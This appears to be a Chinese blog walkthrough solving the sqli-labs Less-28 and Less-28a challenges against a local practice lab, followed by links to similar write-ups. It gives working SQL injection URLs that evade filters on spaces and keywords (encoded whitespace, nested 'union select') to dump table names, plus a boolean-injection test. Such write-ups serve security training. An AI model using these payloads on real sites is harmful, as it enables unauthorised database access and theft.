Less-28

1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'
2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%20select%00,看回显
空格没有了,说明空格被过滤了,尝试使用特殊字符绕过过滤,经测试如下特殊字符可以替换空格%0a,%0d,%20,%0b,/%0a/,再来构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%0dselect%0d1,2,3;%00,看回显
,由前后两次构造的语句和回显提示,说明过滤了union+空格(包括可替代空格的特殊字符)+select,但是又没过滤单独存在的union,select,尝试构造http://127.0.0.1/sqli-labs/Less-28/?id=0')union%0dunion%0dselectselect%0d1,2,3看是否能回显正常,测试后,结果,联合查询注入存在,查询方法前面已有,搞定。

3.再来看看有没有布尔型注入,构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%272%27;%00,http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%271%27;%00后一个回显正常,说明存在布尔型注入,脚本在Less-26已经有了,稍微改一下就好了。

Less-28a


过滤很严格,但是还是存在绕过滴,比如http://127.0.0.1/sqli-labs/Less-28a/?id=0%27)union%0Aseunion%0Aselselectectlect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema=%27security%27;%00,存在联合查询注入,搞定

同样也可以使用脚本进行注入。

sqli-labs(28-28a)相关推荐

  1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

  2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  3. SQLi LABS Less 26a 联合注入+布尔盲注

    第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

  4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  5. sqli——labs初学者通关详

    目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

  6. SQLi LABS Less-8 布尔盲注

    「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...

  7. SQLi LABS Less-31

    第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...

  8. SQLi LABS Less-30

    第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号 输入 1" and true-- a,页面正常显示 输入 1&quo ...

  9. SQLi LABS Less-29

    第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内 ...

  10. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

最新文章

  1. Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
  2. 一线大厂的分布式唯一ID生成方案是什么样的?
  3. 解决Ubuntu中无法连接wifi的方法
  4. CodeFirst 的编程方式
  5. 公共的service接口
  6. VMware——虚拟机的安装
  7. 力扣347. 前 K 个高频元素(JavaScript,堆)
  8. uni-app 2.2 发布,大幅度优化 H5 端性能体验 | 技术头条
  9. 没有下班时间的上班怎么办?
  10. CCF201812-5 管道清洁【最小费可行流】(100分题解链接)
  11. 离阿里最近的机会,来了!
  12. oracle触发器无效且未通过重新验证_更改过程或触发器中的SET选项将导致重新编译...
  13. 深度学习之LSTM完全图解
  14. 前段时间的学习小结——体脂率的计算
  15. 软件工程_三层架构介绍
  16. 面试时候被问到为什么离职 离职原因 该如何回答?
  17. linux分段内存管理中的GDT,LDT,GDTR,LDTR
  18. [机缘参悟-66]:怎样才能让别人愿意帮你:利益共享法则、“大道”、“人性”
  19. [生存志] 第102节 屈原既放赋离骚
  20. tkinter style样式使用

热门文章

  1. 或是独体字吗_知识:贝是独体字吗什么结构
  2. 简述er图的作用_er图的作用是什么
  3. Git学习8 Git分支操作
  4. php随机点名代码怎么做,html座位表随机点名的实例代码
  5. 四川公办二本计算机专业院校排名,四川二本大学排名及分数线
  6. 基于Android的BMI指数运算
  7. priority java_java基础—-多线程之priority(四)
  8. java 加减乘除_加减乘除运算(Java)
  9. 计算机编程需要学哪些基础知识,学编程需要掌握哪些基础知识
  10. 验证哥德巴赫猜想php,庞加莱猜想告破